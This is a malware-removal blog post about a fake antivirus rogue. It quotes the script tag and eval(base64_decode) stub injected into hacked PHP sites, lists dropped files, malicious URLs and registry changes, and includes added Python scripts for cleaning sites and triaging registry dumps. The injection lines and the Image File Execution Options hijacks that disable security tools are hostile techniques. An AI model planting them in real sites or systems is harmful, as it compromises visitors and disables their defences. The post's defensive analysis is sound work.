Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

May 9, 2010 by admin  
Filed under Removal Tips, Tools and Videos




 

 

 

 

Severity Level : 8/10

 

Alias:

  • Mal/FakeAV-BW [Sophos]
  • Generic FakeAlert!hr [McAfee]
  • Packed.Win32.Krap.an [Kaspersky Lab]
  • NOT Detected [Microsoft]

 

VirusTotal report for the downloaded installer packupdate_build107_302.exe: (link)

 

 

Infected Websites

This malware is being served from compromised websites, most of them hosted at GoDaddy, who acknowledged the problem on Twitter (http://twitter.com/GoDaddy/status/13199601776).

On an infected site, the following line is inserted just before the </body> tag in the output of every PHP page:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

 

Examining the PHP files themselves, every one of them has this line prepended (the injected code):

<?php /**/ eval(base64_decode("Random Code" ));?>

"Random Code" stands for a base64-encoded string. Decoding it gives the PHP that writes the <script> tag shown above into each page:

[Screenshot in the original post: the decoded PHP code]

 

 

Remove the injected code from infected sites

Search all index.php and other *.php files for these two fragments and delete them:

1 - <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

2 - <?php /**/ eval(base64_decode("Random Code" ));?>

Removing both from every index and PHP file should solve the problem. Take a backup of the site before editing, and afterwards change the hosting account's FTP and control-panel passwords: if whatever access the attacker used is still open, the files will simply be injected again.
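The cleanup described above, as an added example that is not code from the original post: a script that walks a directory of PHP files, strips both injected fragments, keeps a copy of each infected file as evidence, and decodes the base64 blob so the analyst can read what was actually executed. It assumes the injection takes exactly the two forms quoted on this page; the sample index.php and its base64 blob are constructed stand-ins, not the real payload.

```python
"""Strip the two injected fragments from every PHP file under a directory,
keeping a copy of each infected file as evidence.

Added example, not code from the original post. It assumes the injected
markup takes exactly the two forms quoted on the page: a <script> tag whose
src is http://kdjkfjskdfjlskdjf.com/kp.php, and a
<?php /**/ eval(base64_decode("...")); ?> stub at the top of the file.
The sample file and its base64 blob below are constructed stand-ins.
"""
import base64
import os
import re
import shutil
import tempfile

# The injected <script> tag; the page quotes it both with and without quotes
# around the src attribute, so both are accepted.
SCRIPT_RE = re.compile(
    r'<script\s+src=["\']?https?://kdjkfjskdfjlskdjf\.com/kp\.php["\']?\s*>'
    r'\s*</script>\s*',
    re.IGNORECASE,
)
# The injected PHP stub: an eval() of a base64 blob wrapped in an empty comment.
EVAL_RE = re.compile(
    r'<\?php\s*/\*\*/\s*eval\(\s*base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']'
    r'\s*\)\s*\)\s*;\s*\?>\s*',
    re.IGNORECASE,
)


def clean_php_source(src):
    """Return (cleaned_source, payloads).

    payloads holds the base64 blobs found in eval stubs, decoded so the
    analyst can read what the injection actually executed.
    """
    payloads = []

    def strip_eval(match):
        blob = match.group(1)
        try:
            payloads.append(base64.b64decode(blob).decode("latin-1"))
        except Exception:  # not valid base64: keep the raw blob for the record
            payloads.append(blob)
        return ""

    cleaned = EVAL_RE.sub(strip_eval, src)
    cleaned = SCRIPT_RE.sub("", cleaned)
    return cleaned, payloads


def clean_tree(root):
    """Walk root, back up each infected *.php as *.php.infected, rewrite it
    cleaned, and return {path: decoded payloads} for the files touched."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                original = fh.read()
            cleaned, payloads = clean_php_source(original)
            if cleaned == original:
                continue
            shutil.copy2(path, path + ".infected")  # preserve evidence
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(cleaned)
            findings[path] = payloads
    return findings


# Constructed sample of an infected index.php, shaped like the post describes.
# The base64 blob is a harmless stand-in, not the real payload.
SAMPLE_PAYLOAD = base64.b64encode(b'echo "<!-- injected -->";').decode("ascii")
SAMPLE_INFECTED = (
    '<?php /**/ eval(base64_decode("' + SAMPLE_PAYLOAD + '" ));?>'
    '<?php echo "hello"; ?>\n<html><body>\n<p>site</p>\n'
    '<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script></body></html>\n'
)
SAMPLE_CLEAN = '<?php echo "hello"; ?>\n<html><body>\n<p>site</p>\n</body></html>\n'


def demo():
    """Clean a throwaway directory holding the constructed sample."""
    root = tempfile.mkdtemp()
    try:
        target = os.path.join(root, "index.php")
        with open(target, "w", encoding="latin-1") as fh:
            fh.write(SAMPLE_INFECTED)
        findings = clean_tree(root)
        with open(target, "r", encoding="latin-1") as fh:
            result = fh.read()
        backup_exists = os.path.exists(target + ".infected")
    finally:
        shutil.rmtree(root)
    return result, list(findings.values()), backup_exists


if __name__ == "__main__":
    cleaned, payloads, _ = demo()
    print(cleaned)
    print("decoded payloads:", payloads)
```

Point clean_tree() at the web root (after taking a backup) to clean a real site; the .infected copies and the decoded payloads are what you keep for the incident record. The eval stub is matched on its shape rather than on a specific blob, so it catches every file even though the base64 string differs between them.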

 

 

 

 

Infected PCs (Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an)

 

File System Modifications

The following files were created on the system:

  • %APPDATA%\My Security Engine\Instructions.ini
  • %APPDATA%\My Security Engine\winupdate.exe
  • %APPDATA%\Microsoft\Internet Explorer\Quick Launch\My Security Engine.lnk
  • %USERPROFILE%\Desktop\My Security Engine.lnk
  • %USERPROFILE%\Recent\cb.drv
  • %USERPROFILE%\Recent\CLSV.dll
  • %USERPROFILE%\Recent\eb.dll
  • %USERPROFILE%\Recent\eb.exe
  • %USERPROFILE%\Recent\eb.sys
  • %USERPROFILE%\Recent\exec.exe
  • %USERPROFILE%\Recent\fan.dll
  • %USERPROFILE%\Recent\fix.dll
  • %USERPROFILE%\Recent\FW.dll
  • %USERPROFILE%\Recent\kernel32.exe
  • %USERPROFILE%\Recent\pal.dll
  • %USERPROFILE%\Recent\ppal.exe
  • %USERPROFILE%\Recent\snl2w.dll
  • %USERPROFILE%\Recent\tjd.sys
  • %USERPROFILE%\Start Menu\My Security Engine.lnk
  • %USERPROFILE%\Start Menu\Programs\My Security Engine.lnk
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\8654.mof
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSE.ico
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSESys\vd952342.bd
  • %ALLUSERSPROFILE%\Application Data\MSJMKE\MSTSKDKCKE.cfg

 

Note:

  • %APPDATA% is the user's Application Data folder; on Windows XP this is "C:\Documents and Settings\<user>\Application Data".
  • %USERPROFILE% is the user's profile folder, "C:\Documents and Settings\<user>" on Windows XP.
  • %ALLUSERSPROFILE% is the shared profile folder, "C:\Documents and Settings\All Users" on Windows XP (on the analysis machine it appears as "All Users.WINDOWS" in the registry data below).
  • The folder name e5adcb6 and the MSe5ad prefix are the values seen in this sample; do not rely on them being identical on another machine. The "Recent" folder is an unusual drop location and is worth checking explicitly, since most tools do not scan it.

 

Memory Modifications

The following new processes were created on the system:

Process name     Process filename
winupdate.exe    %APPDATA%\My Security Engine\winupdate.exe
MSe5ad.exe       %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe


 

The following Internet connections were started (where a download produced a file, it was saved under the name shown):

URL                                    Saved as
http://4-open-davinci.com              -
http://kdjkfjskdfjlskdjf.com/kp.php    -
94.228.209.223                         -
http://update2.keepinsafety.net/       -
http://secure2.securexzone.net/        -
http://secure1.guarded-payment.com/    -
http://report.land-protection.com/     -
http://www4.suitcase52td.net           packupdate_build107_302.exe

Note that kdjkfjskdfjlskdjf.com/kp.php is the same URL injected into the compromised websites above; the only download recorded as a file on disk is the installer packupdate_build107_302.exe from www4.suitcase52td.net.

 

Registry Modifications

The newly created or modified registry keys and values are listed below in .reg export layout. Three groups matter for cleanup:

  • The Run value "My Security Engine" relaunches MSe5ad.exe at every logon, and the MSe5ad.DocHostUIHandler COM registration (under both HKEY_CLASSES_ROOT and HKLM\SOFTWARE\Classes) points at the same file.
  • The Internet Explorer values redirect searches to findgala.com and set "PRS" to a listener on 127.0.0.1:27777, which appears to be how the rogue injects its own pages into browsing sessions.
  • The Image File Execution Options entries set "Debugger"="svchost.exe" for the executable names of many security products. Windows starts the named "debugger" in place of the program, so those tools silently fail to launch until the entries are deleted.

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]
@="Implements DocHostUIHandler"

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]
@="{3F2BBC05-40DF-11D2-9455-00104BC936FF}"

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@="Implements DocHostUIHandler"

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@="C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe"

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@="MSe5ad.DocHostUIHandler"

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]
"URL"="http://findgala.com/?&uid=2045&q={searchTerms}"

[HKEY_CURRENT_USER\Software\3]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"IIL"=dword:00000000
"ltHI"=dword:00000000
"ltTST"=dword:0000ba3e
"PRS"="http://127.0.0.1:27777/?inj=%ORIGINAL%"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]
"MSCompatibilityMode"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable"=dword:00000001
"Size"=dword:0000000a
"InitHits"=dword:00000064
"Factor"=dword:00000014

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\88AA5029C7E29F56EE18C3764A808C2A6CE0BE8E]

(A certificate was added to the user's intermediate CA store; remove it along with the rest.)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
"HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr"=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,
"HRZR_EHACVQY:%pfvqy2%\\Zl Frphevgl Ratvar.yax"=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,
"HRZR_EHACVQY:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Fgneg Zrah\\Zl Frphevgl Ratvar.yax"=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

(UserAssist value names are ROT13-encoded. The first decodes to UEME_RUNPATH:C:\Documents and Settings\Administrator\Desktop\packupdate_build106_2045.exe, the installer being run from the desktop; the other two record the My Security Engine.lnk shortcuts being opened.)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"UID"="2045"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
"969903903"=""
"Version/12.02045"=""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"My Security Engine"="\"C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\" /s /d"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\Documents and Settings\\Administrator\\Desktop\\packupdate_build106_2045.exe"="packupdate_build106_2045"
"C:\\WINDOWS\\system32\\taskkill.exe"="Kill Process"
"C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe"="MSe5ad"
"C:\\WINDOWS\\System32\\Wbem\\mofcomp.exe"="mofcomp"
"C:\\WINDOWS\\system32\\netsh.exe"="Network Command Shell"
"C:\\WINDOWS\\system32\\cmd.exe"="Windows Command Processor"
"C:\\Documents and Settings\\Administrator\\Application Data\\My Security Engine\\winupdate.exe"="winupdate"
"C:\\WINDOWS\\system32\\ntvdm.exe"="NTVDM.EXE"

(MUICache records programs that have been run under this user. Besides the installer and its two payloads, the rogue ran taskkill.exe, mofcomp.exe (which compiles a MOF file, presumably the dropped 8654.mof, into the WMI repository), netsh.exe and cmd.exe; check the WMI repository and the firewall configuration as part of cleanup.)

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]
"URL"="http://findgala.com/?&uid=2045&q={searchTerms}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]
@="Implements DocHostUIHandler"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]
@="{3F2BBC05-40DF-11D2-9455-00104BC936FF}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@="Implements DocHostUIHandler"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@="C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@="MSe5ad.DocHostUIHandler"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing"=dword:00000000
"EnableConsoleTracing"=dword:00000000
"FileTracingMask"=dword:ffff0000
"ConsoleTracingMask"=dword:ffff0000
"MaxFileSize"=dword:00100000
"FileDirectory"=hex(2):25,77,69,6e,64,69,72,25,5c,74,72,61,63,69,6e,67,00,

(The FWCFG tracing key is created when the netsh firewall helper is loaded, consistent with the netsh.exe entry in MUICache; the FileDirectory bytes decode to "%windir%\tracing".)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]
"Debugger"="svchost.exe"

...

The Image File Execution Options list continues alphabetically through many more security-product executable names; only the first entries are reproduced here.
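To find these entries in an exported registry dump without reading it line by line, here is an added example (not code from the original post) that parses the .reg-style layout used above and classifies the values that matter: the Run persistence entry, the Internet Explorer search and local-proxy values, the ROT13-encoded UserAssist execution trail, and every Image File Execution Options "Debugger" hijack. The sample dump is a constructed excerpt built from lines quoted on this page, plus one made-up IFEO entry for notepad.exe to show that the rule fires on any Debugger value and not only on svchost.exe; the category names and matching rules are this example's own.

```python
"""Triage a registry dump in the layout shown above and pull out the entries
that matter for this rogue.

Added example, not from the original post. SAMPLE_DUMP is a constructed
excerpt made from lines quoted on this page plus one made-up IFEO entry
(notepad.exe / windbg.exe); the classification rules are this example's own.
"""
import codecs
import re

SAMPLE_DUMP = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"My Security Engine"="\"C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\" /s /d"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"ltTST"=dword:0000ba3e
"PRS"="http://127.0.0.1:27777/?inj=%ORIGINAL%"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]
"URL"="http://findgala.com/?&uid=2045&q={searchTerms}"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
"HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr"=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="windbg.exe"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"([^"]*)")=(.*)$')
IFEO_PATH = "\\microsoft\\windows nt\\currentversion\\image file execution options\\"


def parse_dump(text):
    """Yield (key, value_name, value) triples; string values lose their quotes."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            value = m.group(2)
            if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
                value = value[1:-1]
            yield key, name, value


def triage(text):
    """Return a list of (category, subject, value) findings from a dump."""
    findings = []
    for key, name, value in parse_dump(text):
        low = key.lower()
        if IFEO_PATH in low and name.lower() == "debugger":
            # Windows launches the "debugger" instead of the named program, so a
            # Debugger value on a security product's exe name disables that product.
            findings.append(("ifeo_hijack", key.rsplit("\\", 1)[1], value))
        elif low.endswith("\\currentversion\\run"):
            findings.append(("run_key", name, value))
        elif low.endswith("\\internet explorer") and name == "PRS":
            findings.append(("ie_local_proxy", name, value))
        elif low.endswith("\\searchscopes") and name.lower() == "url":
            findings.append(("search_hijack", name, value))
        elif "\\userassist\\" in low:
            # UserAssist value names are ROT13; decoding reveals what was run.
            findings.append(("userassist", codecs.decode(name, "rot_13"), value))
    return findings


if __name__ == "__main__":
    for category, subject, value in triage(SAMPLE_DUMP):
        print(f"{category:15} {subject}  ->  {value}")
```

Feed triage() the text of a full export (regedit's "Export" output, or a sandbox report in the same layout) and the ifeo_hijack findings give you the exact list of executable names to delete under Image File Execution Options before trying to run a scanner. Any Debugger value is reported, because a legitimate one is rare enough on an end-user machine that each deserves a look.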


 


 

Removal Tools:

1 - Download the free version of Malwarebytes Anti-Malware, provided by www.malwarebytes.org (link).

2 - Download MicrosoftFixit50267.msi, Microsoft's Fix it that restores the hosts file (link).

Before running the scanner, check the Image File Execution Options keys listed above: if the scanner's executable name has a "Debugger"="svchost.exe" entry, it will not start. Either delete that entry or rename the scanner's executable to a name not on the list, run the scan, then remove the remaining entries once the rogue is gone.

 


 

For any help contact us.
VirusExperts.org TEAM


Additional files in %Temp%:

  • %Temp%\cvasds0.dll
  • %Temp%\cvasds1.dll
  • %Temp%\cvasds2.dll

